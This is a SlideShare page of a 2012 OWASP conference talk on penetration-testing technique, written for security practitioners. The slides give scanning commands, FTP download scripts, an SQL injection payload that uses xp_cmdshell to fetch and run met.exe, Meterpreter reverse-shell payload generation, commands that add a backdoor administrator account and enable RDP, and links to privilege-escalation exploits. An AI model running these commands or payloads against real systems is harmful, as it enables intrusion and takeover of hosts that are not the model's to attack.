SlideShare ist ein Scribd-Unternehmen logo

Public exploit held private : Penetration Testing the researcher’s way

T
titanlambda

This talk is about how to solve practical challenges faced during pen-testing and exploits. Will help you to understand how it can be done efficiently. Will explore various tips and tricks about it. It will try to solve the common questions like: 0. How do I prepare? What kind of tools I should have? 1. I need to scan the entire network in a faster way? 2. How can I get more accurate results for scanning and fingerprinting? 3. Nessus says it is vulnerable but how can I exploit? 4. What if I know it is vulnerable but I don’t have any exploits available? 5. I am inside the box, compromised it, now what to do? In short, it will show you the pain points of a typical pen-testing exercise how to deal with it and will help you to reach to “42”, the answer to life, the universe and everything.

Technologie
1 von 36
OWASP InfoSec India Conference 2012 August 24th – 25th, 2012 The OWASP Foundation Hotel Crowne Plaza, Gurgaon http://www.owasp.org http://www.owasp.in Public exploit held private : Penetration Testing the researcher’s way Tamaghna Basu GCIH, OSCP, RHCE, CEH, ECSA tamaghna.basu@gmail.com OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
DISCLAIMER! This presentation contains materials on the evolution of a pen tester which is solely based on the perspective of the speaker which might contradict with opinions of individuals. All the scenarios explained here are fictional even though they might resemble to realistic situations. Even though no harm intended, if it causes any discomfort to you spiritually and/or physically, the speaker, organizers, hotel authority, climate control people and the person sitting next to you will not be responsible for that. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 2
Setting the context Why Pentesting? How do you do it?  To VA or to PT… That’s the question. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 3
Setting the context  Terminologies  Vulnerability  Exploit  Payload  Reverse shell OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 4
Basics Pentesting  Internal  External  Automated -> review the report -> get the final report  Manual -> run few basic tools -> get the report done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 5
Basics… Pentesting Steps  Recon and Scanning  Exploit  Maintain Access  Clean up OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 6
Scanning Why?  Identify the live hosts  OS fingerprinting  Service fingerprinting OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 7
Scanning Desi Jugaad  Ping sweep / shell scripts  Decent tools (But indecent usage)  NMAP (behold the power of NSE)  Others? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 8
Desi Jugaad (Local Hack) Ping Sweep Windows FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply“ Linux #!/bin/bash for ip in $(seq 1 254); do ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 & done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 9
Scanning Problem!  It is taking too long to scan, need to go for lunch…  Is it really a windows box but looks like a Linux box? Or which version? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 10
Desi Jugaad  Nmap  nmap –sV 192.168.15.201  nmap –O 192.168.15.201  nmap –A 192.168.15.201  nmap –p 1-65535 –sV 192.168.15.201  Nmap –p T:80 192.168.15.200-250  Zenmap  Unicorn scan - us -H -msf -Iv 192.168.13.201 -p 1- 65535 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
Nmap Scripts /usr/locale/share/nmap/scripts OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 12
Nmap Scripts • Shared files and folders • nmap --script=smb-enum-shares 192.168.80.129 • Check for SMB vulnerabilities • nmap --script=smb-check-vulns 192.168.80.129 • Scan for machines that use default Ms sql username,password • nmap --script=ms-sql-info 192.168.80.129 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 13
Scanning I have Nessus. Why to go through so much pain? I don’t have Nessus. What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 14
Exploit  Motive  To gain access  Data  Command execution  Destroy everything!  Categories  Service level  OS OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 15
Exploit What to exploit?  FTP?  HTTP?  SNMP?  What else? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 16
Exploit  FTP  Server Exploit – Buffer Overflow  Fuzzing???  Bruteforce SNMP  What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 17
FTP Tips Windows echo open 192.168.12.124 > ftp.txt echo ftp>> ftp.txt echo ftp>> ftp.txt echo bin >> ftp.txt echo get met2.exe >> ftp.txt echo bye >> ftp.txt ftp -s:ftp.txt OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 18
FTP Tips Linux echo quote user ftp>> ftp.txt quote user ftp echo quote pass ftp>>ftp.txt echo verbose>>ftp.txt echo binary >> ftp.txt echo get exploit.c >> ftp.txt echo bye >> ftp.txt cat ftp.txt|ftp -n 192.168.12.124 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 19
Exploit  HTTP  Server Exploit  Command Execution  Web Shells  SQLi OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 20
HTTP OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 21
SQLi Tips ' or 1=1;exec master..xp_cmdshell 'echo open 192.168.12.124> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo bin>> ftpmet.txt';exec master..xp_cmdshell 'echo get met.exe>> ftpmet.txt';exec master..xp_cmdshell 'echo bye';exec master..xp_cmdshell 'ftp - s:ftpmet.txt';exec master..xp_cmdshell 'met.exe';-- OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 22
SQLi Tips My SQL non-interactive  "mysql --host=127.0.0.1 --user=root -- password=‘password' -e "use mysql; show tables;"  "mysql --host=127.0.0.1 --user=root -- password=‘password' -e "SELECT LOAD_FILE('/etc/passwd') INTO dumpfile '/tmp/passwd';" OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 23
Exploit  Metasploit  Use Exploit  Set payload  exploit  Any other options? How about writing own exploit (at free time) (out of scope) OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 24
L33t love story  Exploit’s love letter to the machine  PAYLOAD… Which courier?  MSF – set payload  Custom program – msfpayload  Bad characters  Executable - msfpayload OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 25
Payload Generator  meterpreter msfpayload options: ./msfpayload windows/meterpreter/reverse_tcp O Create exe: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe Generate shellcode: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 C OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 26
From msf: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.40 set LPORT 80 show options exploit OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 27
Exploit I am in, what to do?  Secure access?  Add user  Open a port  I like it the reverse way  meterpreter  Dude, did you get root/admin acces? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 28
Add User  Windows Shell net user hacker hacker123 /add net localgroup administrators hacker /add  Meterpreter use incognito add_user hacker hacker123 add_localgroup_user Administrators hacker  RDP enable reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSet ControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 29
Privilege Escalation  Categories  Service level  OS Problem!  How can I transfer my exploit there?  Netcat  FTP OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 30
Kernel Exploits  Linux Kernel <= 2.6.36-rc8 http://www.exploit- db.com/exploits/15285/  Linux Kernel 2.4/2.6 http://www.exploit- db.com/exploits/9545/  Linux Kernel 2.6 http://www.exploit- db.com/exploits/8478/  Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 http://www.exploit-db.com/exploits/9844/ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 31
Windows Exploits  Windows Vista, 7, 2008 http://www.exploit- db.com/exploits/15609/  Windows XP, 2003 http://www.exploit- db.com/exploits/18176/  Linux + NT priv esc http://www.exploit- db.com/exploits/9301/  Windows XP SP2, SP3 http://www.exploit- db.com/exploits/9301/ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 32
Pivoting…  Huh? Why do I need it? How do I do it?  nc + port forwarding  Ssh tunneling OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 33
Fuzzing…  My favorite but last thing I prefer to do on my own  Python rocks!  Basic  Advanced  SEH handler  Egg hunting shellcode OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 34
Did I miss anything?  Questions  Perspectives  Comments tamaghna.basu@gmail.com twitter.com/titanlambda linkedin.com/in/tamaghnabasu OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 35
Thank you tamaghna.basu@gmail.com twitter.com/titanlambda linkedin.com/in/tamaghnabasu 36 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)

Empfohlen

Public exploit held private – penetration testing the researcher’s way tama...
Public exploit held private – penetration testing the researcher’s way tama...Public exploit held private – penetration testing the researcher’s way tama...
Public exploit held private – penetration testing the researcher’s way tama...owaspindia
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
 
Escape the defaults - Configure Sling like AEM as a Cloud Service
Escape the defaults - Configure Sling like AEM as a Cloud ServiceEscape the defaults - Configure Sling like AEM as a Cloud Service
Escape the defaults - Configure Sling like AEM as a Cloud ServiceRobert Munteanu
 
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]David Buck
 
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程Jimmy Chang
 
На страже ваших денег и данных
На страже ваших денег и данныхНа страже ваших денег и данных
На страже ваших денег и данныхPositive Hack Days
 
Introducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisIntroducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisBrian Baskin
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияPositive Hack Days
 

Empfohlen

Public exploit held private – penetration testing the researcher’s way tama...
Public exploit held private – penetration testing the researcher’s way tama...Public exploit held private – penetration testing the researcher’s way tama...
Public exploit held private – penetration testing the researcher’s way tama...owaspindia
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
 
Escape the defaults - Configure Sling like AEM as a Cloud Service
Escape the defaults - Configure Sling like AEM as a Cloud ServiceEscape the defaults - Configure Sling like AEM as a Cloud Service
Escape the defaults - Configure Sling like AEM as a Cloud ServiceRobert Munteanu
 
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]
JDK Mission Control: Where We Are, Where We Are Going [Code One 2019]David Buck
 
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程Jimmy Chang
 
На страже ваших денег и данных
На страже ваших денег и данныхНа страже ваших денег и данных
На страже ваших денег и данныхPositive Hack Days
 
Introducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisIntroducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisBrian Baskin
 
Внедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияВнедрение безопасности в веб-приложениях в среде выполнения
Внедрение безопасности в веб-приложениях в среде выполненияPositive Hack Days
 
The magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumarThe magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumarowaspindia
 
Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...owaspindia
 
Docker In Bank Unrated
Docker In Bank UnratedDocker In Bank Unrated
Docker In Bank UnratedAleksandr Tarasov
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.Dmitry Iudin
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...Jisc
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersJavan Rasokat
 
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...VISEO
 
Replay Solutions CFD
Replay Solutions CFDReplay Solutions CFD
Replay Solutions CFDkilroy440
 
The Era of Module Bundlers
The Era of Module BundlersThe Era of Module Bundlers
The Era of Module BundlersArun Michael Dsouza
 
Good practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsGood practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsAbhijeet Vaikar
 
Compliance as Code Everywhere
Compliance as Code EverywhereCompliance as Code Everywhere
Compliance as Code EverywhereMatt Ray
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxnmk42194
 
OpenStack keystone identity service
OpenStack keystone identity serviceOpenStack keystone identity service
OpenStack keystone identity serviceopenstackindia
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6Wim Godden
 
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...Rosemary Wang
 
ROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowDatabricks
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and securityAlmudena Vivanco
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 
Real world Webapp
Real world WebappReal world Webapp
Real world WebappThings Lab
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 

Weitere ähnliche Inhalte

Ähnlich wie Public exploit held private : Penetration Testing the researcher’s way

The magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumarThe magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumarowaspindia
 
Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...owaspindia
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.Dmitry Iudin
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...Jisc
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersJavan Rasokat
 
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...VISEO
 
Replay Solutions CFD
Replay Solutions CFDReplay Solutions CFD
Replay Solutions CFDkilroy440
 
Good practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsGood practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsAbhijeet Vaikar
 
Compliance as Code Everywhere
Compliance as Code EverywhereCompliance as Code Everywhere
Compliance as Code EverywhereMatt Ray
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxnmk42194
 
OpenStack keystone identity service
OpenStack keystone identity serviceOpenStack keystone identity service
OpenStack keystone identity serviceopenstackindia
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6Wim Godden
 
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...Rosemary Wang
 
ROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowDatabricks
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and securityAlmudena Vivanco
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 
Real world Webapp
Real world WebappReal world Webapp
Real world WebappThings Lab
 

Ähnlich wie Public exploit held private : Penetration Testing the researcher’s way (20)

The magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumarThe magic of passive web vulnerability analysis lava kumar
The magic of passive web vulnerability analysis lava kumar
 
Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...Real time evaluation of national network exposure to emerging threats - fyodo...
Real time evaluation of national network exposure to emerging threats - fyodo...
 
Docker In Bank Unrated
Docker In Bank UnratedDocker In Bank Unrated
Docker In Bank Unrated
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
EAP TLS, the Rolls-Royce of extensible authentication protocol (EAP) methods ...
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
 
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
What’s new in Microsoft ALM 2013, hosted in Windows Azure, VISUAL STUDIO ONLI...
 
Replay Solutions CFD
Replay Solutions CFDReplay Solutions CFD
Replay Solutions CFD
 
The Era of Module Bundlers
The Era of Module BundlersThe Era of Module Bundlers
The Era of Module Bundlers
 
Good practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium testsGood practices for debugging Selenium and Appium tests
Good practices for debugging Selenium and Appium tests
 
Compliance as Code Everywhere
Compliance as Code EverywhereCompliance as Code Everywhere
Compliance as Code Everywhere
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
 
OpenStack keystone identity service
OpenStack keystone identity serviceOpenStack keystone identity service
OpenStack keystone identity service
 
The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6The why and how of moving to PHP 5.5/5.6
The why and how of moving to PHP 5.5/5.6
 
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
 
ROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlowROCm and Distributed Deep Learning on Spark and TensorFlow
ROCm and Distributed Deep Learning on Spark and TensorFlow
 
Fine line between performance and security
Fine line between performance and securityFine line between performance and security
Fine line between performance and security
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Real world Webapp
Real world WebappReal world Webapp
Real world Webapp
 

Kürzlich hochgeladen

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 

Kürzlich hochgeladen (20)

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
